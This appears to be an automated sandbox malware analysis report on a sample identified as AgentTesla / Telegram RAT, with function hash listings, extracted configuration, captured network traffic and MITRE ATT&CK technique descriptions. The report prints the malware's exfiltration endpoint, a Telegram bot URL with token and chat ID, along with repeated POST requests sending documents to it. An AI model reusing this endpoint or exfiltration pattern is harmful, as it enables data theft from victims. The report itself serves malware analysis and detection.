Instruction ID: ba9317ca0ff0d24c2072acc89b64eedf6886811092656af0fe6c65d044d93965
Opcode Fuzzy Hash: 5027e1aaa409823fa022b4ead9ba564cb914900a24fdb92b44426cafe0b1251f
Instruction Fuzzy Hash: D9212571610208EFDB11DF64D5C0B26FB65FB84714F20C67DDB094B242C376E446CAA1

Function 06CC3570 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8831aee8859fe1a380be463f5024ffced1c7c38efe8c6d17274526d2a49e20a
Instruction ID: 64f6a1258b5a938b4179b491d6fad217f200fdeba20c467f742274b7b31d82d0
Opcode Fuzzy Hash: a8831aee8859fe1a380be463f5024ffced1c7c38efe8c6d17274526d2a49e20a
Instruction Fuzzy Hash: 3B118E71E002599BCB54DB69E9805DEB7B5EB89320F10896DD50AEB340DA31DA41CBD0

Function 06CC40D0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8024527b51fd6db91899d6392551ad04f74294912638dc27d23c31895953e5e
Instruction ID: 08aa2dceef84a8deff1b463b3c72d99145a615a04a408bc216230fbf2bb02adf
Opcode Fuzzy Hash: c8024527b51fd6db91899d6392551ad04f74294912638dc27d23c31895953e5e
Instruction Fuzzy Hash: 18118E35B100258BDB58D669D8246AE73EAEBC9221F00C539D406E7340EE65DC018BD0

Function 06CC4308 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a42eec798ab6ba727b61a71797234c9eeebb1e5e71545cbe0982b5762d5102
Instruction ID: 13466df9b06590117f61c9ad4d30835196d08e274af63ce69d54a2c460587dbf
Opcode Fuzzy Hash: 48a42eec798ab6ba727b61a71797234c9eeebb1e5e71545cbe0982b5762d5102
Instruction Fuzzy Hash: 2001D230B100114BDB69CA7C946076EA7D7EFC5720F28C83EE449C7391DA25DC0A4380

Function 06CCF298 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b26c3c38a06f341b99ad7f0233d6f49e40d4596543d166a352c1b046f597394
Instruction ID: 69ebdee56d7c1c47efe885216594cda744641de6fae68b2398b2a329fe37920f
Opcode Fuzzy Hash: 3b26c3c38a06f341b99ad7f0233d6f49e40d4596543d166a352c1b046f597394
Instruction Fuzzy Hash: A001B135B141515BEB65CBBCE86476E77E3DFC9620B24882EE05AC7381DA25CD478381

Function 06CC3D88 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080f01d571d759709ea08510f821bcaa6ddb867c8acc050ec47cb8c3992984de
Instruction ID: 9000520a0ceedbda963a3e83b275b8d6102e378c6ff7ca439d052bc3378df431
Opcode Fuzzy Hash: 080f01d571d759709ea08510f821bcaa6ddb867c8acc050ec47cb8c3992984de
Instruction Fuzzy Hash: 1C21E0B5C01259AFCB10CF9AD884ADEFFB4BB48310F10822AE518B7300C374A955CFA4

Function 06CC2370 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 134787a9ac3eec0d2ca0e4ad7333068a4bff476a4c757f544014478edfd71f20
Instruction ID: 6db2b3f4d9c27023b79d45d5c323d45c3855a8c4a2e753ab5568c70e0bdff914
Opcode Fuzzy Hash: 134787a9ac3eec0d2ca0e4ad7333068a4bff476a4c757f544014478edfd71f20
Instruction Fuzzy Hash: BD21E0B1D01259AFCB10DF9AD884ADEFBF4FB48620F10812AE918B7200C375A954CBE5

Function 012CD207 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573183503.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12cd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a17b32a4d52625cadd0f9ecc214952461d3c7e875772a6c7a986913f5e1172
Instruction ID: 5c761fa0bac86cc74eaf8236ac2755d09ba879df57c079b023779c5c1c487efd
Opcode Fuzzy Hash: 13a17b32a4d52625cadd0f9ecc214952461d3c7e875772a6c7a986913f5e1172
Instruction Fuzzy Hash: 9611DD76504288DFDB02CF54D5C4B16FF62FB84624F24C6AEDA490B647C33AD40ACBA2

Function 012CD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573183503.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12cd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 2bd166c77e5c9a7b0b93f83ee4d428660d343f65574d43d33260cc570f343c8a
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 9A11AC75504288DFCB12CF58C9C4B15BB61FB84714F24C6ADDA494B652C33AD44ACB92

Function 012CD3B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573183503.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12cd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 246f7cd6a77c058969ee14ae2ef29208f834dc04717aea8baf6d734d21e91d0c
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 7411BB75504284DFCB12CF54D5C4B15FFA2FB84614F24C6AEDA494B256C33AE44ACBA2

Function 06CC40BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6fcea2c942afc1fc4ed7f58f0909939c4505f9485a9d6d24ba92634aa1c8cb
Instruction ID: 898c9d6544ae1f486c4fd5cefa0447c687956a012b16775b5c2a0a2a1ccdb54e
Opcode Fuzzy Hash: 7c6fcea2c942afc1fc4ed7f58f0909939c4505f9485a9d6d24ba92634aa1c8cb
Instruction Fuzzy Hash: 0001DF36B100655BEB58D9A8DC247EB73EAEBC9221F04803AD40AE3344EE29CC0247E1

Function 06CCA40A Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210e79dcfdc424048e77cd93947ade5592388a832e092477d79e7b11865cddc6
Instruction ID: 9ddaa2945c407e0310ce1b7194f89e28705ac8656a4de8281a02f496075c0622
Opcode Fuzzy Hash: 210e79dcfdc424048e77cd93947ade5592388a832e092477d79e7b11865cddc6
Instruction Fuzzy Hash: DD018430B001195FDB65DABCE85876A77E2EB8A720F20883DE149C7350EE25DD468785

Function 06CC4318 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f49afd2e7997946be856209465aaf668e548011bf6ecc36e64c3205a59328d0
Instruction ID: 00496326c1c0aa7bf24c1c8ea642b0f5f3937f7ca453c939704e104b236e5a0e
Opcode Fuzzy Hash: 2f49afd2e7997946be856209465aaf668e548011bf6ecc36e64c3205a59328d0
Instruction Fuzzy Hash: 4A01AD31B100111BEBA895BDA42576EB3DAEFC9B20F14C83EE50AC7380EE65DC024381

Function 06CCF2A8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb8c33c97d601e6805c89aac63dcd9120b207bdd9ce9771c478bec5704db7c4
Instruction ID: 4a54d55640c66f2b4a2d65936f91c7afb555ce1ef936dbdbbdcbdbe632708194
Opcode Fuzzy Hash: 8fb8c33c97d601e6805c89aac63dcd9120b207bdd9ce9771c478bec5704db7c4
Instruction Fuzzy Hash: 2C018C35B100151BEB65DABDA864B6E63D7DBC9620F24883EE50ACB380EE25DD028381

Function 06CCA418 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21341be4ed0ed66a7210526725fb41fce09b151880c5283389d61c13ce22851b
Instruction ID: f4375fb3237dda2f64e7d820bce0aff665541439e21bd3ccbe1ac84b83f28e73
Opcode Fuzzy Hash: 21341be4ed0ed66a7210526725fb41fce09b151880c5283389d61c13ce22851b
Instruction Fuzzy Hash: AD01A430B101195BDB61DABCE458B2A73D6EBCA724F10883CE10AC7350EE25DD4247C5

Function 012BD8B1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573119624.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12bd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9888f43f6359cbf84047a9724f1714b6ec157008215ead1facef7f67bfb3a9a3
Instruction ID: 7a8b3c95211cf83f08a664f5c3cb09faba27bdca29d734e5371fd85d6c67c0f0
Opcode Fuzzy Hash: 9888f43f6359cbf84047a9724f1714b6ec157008215ead1facef7f67bfb3a9a3
Instruction Fuzzy Hash: 4801F731019749EAE7104EA9DDC4BE7FF98EF413A8F18841AEE485A282C6799444C7B1

Function 06CCCCE8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137eea7d9617e5b367376245848562eab54d4f530d7d1205b793b38aa5d2f7e5
Instruction ID: bdf24abd0f4d5539b7253a4e7f6857550ff08f2a1d8eb40573fe29b26af332c8
Opcode Fuzzy Hash: 137eea7d9617e5b367376245848562eab54d4f530d7d1205b793b38aa5d2f7e5
Instruction Fuzzy Hash: A601A431E20129ABDB249E69E841AAEB775FB85760F00493DE905EB344DB35AD0587C0

Function 012BD8B0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573119624.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12bd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e514093b37fc8e345ba8b42b943102c3c33f898122d52d378fdead845bb6440
Instruction ID: 5672038ac1bf7dd87f7fd003b95e561a0f535b62ac2874ee41e7eff8f3a86ad0
Opcode Fuzzy Hash: 0e514093b37fc8e345ba8b42b943102c3c33f898122d52d378fdead845bb6440
Instruction Fuzzy Hash: 83F0C271405748AAE7108E09DCC4BA2FF98EB41764F18C05AEE484F293C2799844CBB1

Function 06CCB020 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a0ae2aae436ce9502c9eec02046355577b73bc28edf1555b1ad24841c73b03
Instruction ID: 2f43075098bd6d0f940845825b274831b351d54e97d8548489dd431835792e39
Opcode Fuzzy Hash: c5a0ae2aae436ce9502c9eec02046355577b73bc28edf1555b1ad24841c73b03
Instruction Fuzzy Hash: 4CF0A072E202588BDF7086E8D94579ABBA9E786330F00483EE91AE7240D6319E448781

Function 06CC83CF Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab25b73638b89838ad8ac5eac64884cd9e7eeafe65a407abf29f5ce64b3246d
Instruction ID: ca63691966553e88902c1b5461900d90b8861cfee91f02951466d3ed368e8afd
Opcode Fuzzy Hash: 7ab25b73638b89838ad8ac5eac64884cd9e7eeafe65a407abf29f5ce64b3246d
Instruction Fuzzy Hash: CBF08C36E06114CFEB64CE52E8642AABF78FB81335F18407EC801D7151C3799A82CB81

Function 06CC6571 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e19d4566e1516384038eafca739aa7ad04815860d80a7e46c89e175d800d5c4
Instruction ID: 3490f514a0fb3956bf3e806b539fed30c993edc6c52c7ce5f20a545e7486b673
Opcode Fuzzy Hash: 6e19d4566e1516384038eafca739aa7ad04815860d80a7e46c89e175d800d5c4
Instruction Fuzzy Hash: 5AE09270E15244AFDB50CA718E4566A7FADDB46224F3189A9E045D7206D137CB4287A1

Function 06CC4B59 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f43d3a6998a189e6ffd156b39363196259243fba1972d3e54f0756f1d7460d
Instruction ID: eca92820591bc78d26710d3ec357c50f39722aeea909e3fefb5f4e155d7cb0ee
Opcode Fuzzy Hash: f9f43d3a6998a189e6ffd156b39363196259243fba1972d3e54f0756f1d7460d
Instruction Fuzzy Hash: 0BF0FE30A2411AEFDF28DF94E8A9BAD7BB6FF44710F208119E402A7284CB741C45CBC0

Function 06CC6580 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53210c76363734de6966560b7cfecdc18779b43a6f3617cc3761bdb9cae985f3
Instruction ID: 8461d1e0d10b1c3c1f059c76b72c2b747f2b60e83e3a99658640d73b174e98ed
Opcode Fuzzy Hash: 53210c76363734de6966560b7cfecdc18779b43a6f3617cc3761bdb9cae985f3
Instruction Fuzzy Hash: 99E01271E20108ABDF50DEB5CA4575E77ADD745224F3088ADD409D7206E576DB429780

Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage?chat_id=1394550246"}
Source: LisectAVT_2403002A_127.exe.5396.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage"}

Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcacd37f51b3f3Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb9d07bd4088fHost: api.telegram.orgContent-Length: 59488Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbd2f89f881a1Host: api.telegram.orgContent-Length: 57562Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbf70b25255b6Host: api.telegram.orgContent-Length: 57562Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc56227d5fe15Host: api.telegram.orgContent-Length: 57551Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc9f9cbbe4ea1Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dccc3999cbfb48Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcceb63c23233eHost: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd5311bcd1988Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd883f159ae3dHost: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdb04645b2b88Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdf0de441e7a8Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce4e1dc8f71b2Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce963108a87c4Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcec75a72c3e04Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcef2136d34414Host: api.telegram.orgContent-Length: 57558Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf244c2bc1a24Host: api.telegram.orgContent-Length: 61460Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf5eb5d0922e3Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcfac024112999Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0041be87c706Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd077b581d181aHost: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0c9d0c344755Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1001a144c656Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1279d3482702Host: api.telegram.orgContent-Length: 60931Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd14f0e836a8c1Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd183344abb936Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1ad724ca83faHost: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcacd40e7a0308Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

